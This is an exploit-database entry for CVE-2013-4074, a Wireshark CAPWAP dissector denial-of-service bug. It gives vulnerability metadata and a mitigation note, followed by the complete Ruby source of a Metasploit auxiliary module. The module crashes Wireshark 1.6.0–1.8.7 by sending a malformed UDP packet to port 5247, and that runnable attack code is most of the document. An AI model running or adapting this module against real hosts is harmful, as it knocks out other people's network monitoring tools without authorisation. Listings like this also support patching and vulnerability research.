Wireshark CAPWAP Dissector DoS

vendor:

Wireshark

by:

Laurent Butti, j0sm1

7,8

CVSS

HIGH

Denial of Service

119

CWE

Product Name: Wireshark

Affected Version From: 1.6.0

Affected Version To: 1.8.7

Patch Exists: YES

Related CWE: CVE-2013-4074

CPE: a:wireshark:wireshark

Metasploit: https://www.rapid7.com/db/vulnerabilities/wireshark-cve-2013-4074/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2013-4074/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2013-4074/, https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2013-4074/, https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2013-4074/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2014

Wireshark CAPWAP Dissector DoS

This module injects a malicious UDP packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0 to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an incomplete packet.

Mitigation:

Update to the latest version of Wireshark.

Source

Exploit-DB raw data:

#
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wireshark CAPWAP Dissector DoS',
      'Description'    => %q{
        This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0
        to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an
        incomplete packet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Laurent Butti', # Discovery vulnerability
          'j0sm1'  # Auxiliary msf module
        ],
      'References'     =>
        [
          ['CVE', '2013-4074'],
          ['OSVDB', '94091'],
          ['BID', '60500']
        ],
      'DisclosureDate' => 'Apr 28 2014'))

    # Protocol capwap needs port 5247 to trigger the dissector in wireshark
    register_options([ Opt::RPORT(5247) ], self.class)
  end

  def run

    connect_udp

    # We send a packet incomplete to crash dissector
    print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...")
    # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then
    # the dissector crash
    # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt
    # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000
    buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15)
    udp_sock.put(buf)

    disconnect_udp

  end
end